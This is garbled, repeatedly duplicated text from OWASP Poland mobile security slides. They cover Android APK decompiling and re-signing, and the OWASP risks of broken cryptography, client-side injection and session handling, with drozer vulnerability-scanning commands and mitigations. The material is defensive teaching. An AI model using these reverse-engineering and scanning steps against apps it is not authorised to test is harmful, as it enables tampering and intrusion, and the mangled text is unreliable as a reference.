id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
